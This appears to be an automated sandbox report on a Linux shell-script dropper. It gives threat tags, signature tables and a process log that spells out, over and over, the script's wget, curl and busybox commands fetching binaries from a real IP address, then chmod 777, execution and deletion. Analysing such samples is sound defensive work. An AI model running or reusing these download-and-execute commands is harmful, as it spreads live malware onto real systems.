Malware Analysis Report

2025-04-03 19:12

Sample ID 241120-ddcflaypbx
Target 77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh
SHA256 77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb

Threat Level: Shows suspicious behavior

The file 77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-20 02:53

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-20 02:53

Reported

2024-11-20 02:55

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

12s

Max time network

129s

Command Line

[/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 N/A
N/A /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU N/A
N/A /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 N/A
N/A /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 N/A
N/A /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT N/A
N/A /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC N/A
N/A /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 N/A
N/A /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f N/A
N/A /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY N/A
N/A /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl N/A
N/A /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw N/A
N/A /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY N/A
N/A /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh N/A
N/A /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq N/A
N/A /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 N/A
N/A /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU N/A
N/A /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 N/A
N/A /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 N/A
N/A /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT N/A
N/A /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC N/A
N/A /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 N/A
N/A /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f N/A
N/A /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY N/A
N/A /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl N/A
N/A /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw N/A
N/A /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY N/A
N/A /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh N/A
N/A /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 /usr/bin/curl N/A
File opened for modification /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl /usr/bin/curl N/A
File opened for modification /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY /usr/bin/curl N/A
File opened for modification /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 /usr/bin/curl N/A
File opened for modification /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY /usr/bin/curl N/A
File opened for modification /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY /usr/bin/curl N/A
File opened for modification /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 /usr/bin/curl N/A
File opened for modification /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT /usr/bin/curl N/A
File opened for modification /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 /usr/bin/curl N/A
File opened for modification /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU /usr/bin/curl N/A
File opened for modification /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl /usr/bin/curl N/A
File opened for modification /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh /usr/bin/curl N/A
File opened for modification /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw /usr/bin/curl N/A
File opened for modification /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq /usr/bin/curl N/A
File opened for modification /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 /usr/bin/curl N/A
File opened for modification /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT /usr/bin/curl N/A
File opened for modification /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f /usr/bin/curl N/A
File opened for modification /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw /usr/bin/curl N/A
File opened for modification /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 /usr/bin/curl N/A
File opened for modification /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC /usr/bin/curl N/A
File opened for modification /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU /usr/bin/curl N/A
File opened for modification /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC /usr/bin/curl N/A
File opened for modification /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY /usr/bin/curl N/A
File opened for modification /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh /usr/bin/curl N/A
File opened for modification /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 /usr/bin/curl N/A
File opened for modification /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f /usr/bin/curl N/A
File opened for modification /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 /usr/bin/curl N/A
File opened for modification /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq /usr/bin/curl N/A

Processes

/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh

[/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/chmod

[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1

[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/rm

[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/usr/bin/wget

[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/chmod

[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU

[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/rm

[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/usr/bin/wget

[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/chmod

[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1

[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/rm

[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/usr/bin/wget

[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/chmod

[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7

[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/rm

[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/usr/bin/wget

[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/chmod

[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT

[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/rm

[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/usr/bin/wget

[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/chmod

[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC

[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/rm

[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/usr/bin/wget

[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/chmod

[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4

[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/rm

[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/usr/bin/wget

[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/chmod

[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f

[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/rm

[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/usr/bin/wget

[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/chmod

[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY

[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/rm

[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/usr/bin/wget

[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/chmod

[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl

[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/rm

[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/usr/bin/wget

[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/bin/chmod

[chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw

[./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/bin/rm

[rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/usr/bin/wget

[wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/bin/chmod

[chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY

[./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/bin/rm

[rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/usr/bin/wget

[wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/bin/chmod

[chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh

[./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/bin/rm

[rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/usr/bin/wget

[wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/bin/chmod

[chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq

[./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/bin/rm

[rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/usr/bin/wget

[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/chmod

[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1

[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/rm

[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/usr/bin/wget

[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/chmod

[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU

[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/rm

[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/usr/bin/wget

[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/chmod

[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1

[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/rm

[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/usr/bin/wget

[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/chmod

[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7

[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/rm

[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/usr/bin/wget

[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/chmod

[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT

[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/rm

[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/usr/bin/wget

[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/chmod

[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC

[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/rm

[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/usr/bin/wget

[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/chmod

[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4

[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/rm

[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/usr/bin/wget

[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/chmod

[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f

[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/rm

[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/usr/bin/wget

[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/chmod

[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY

[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/rm

[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/usr/bin/wget

[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/chmod

[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl

[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/rm

[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/usr/bin/wget

[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/bin/chmod

[chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw

[./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/bin/rm

[rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/usr/bin/wget

[wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/bin/chmod

[chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY

[./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/bin/rm

[rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/usr/bin/wget

[wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/bin/chmod

[chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

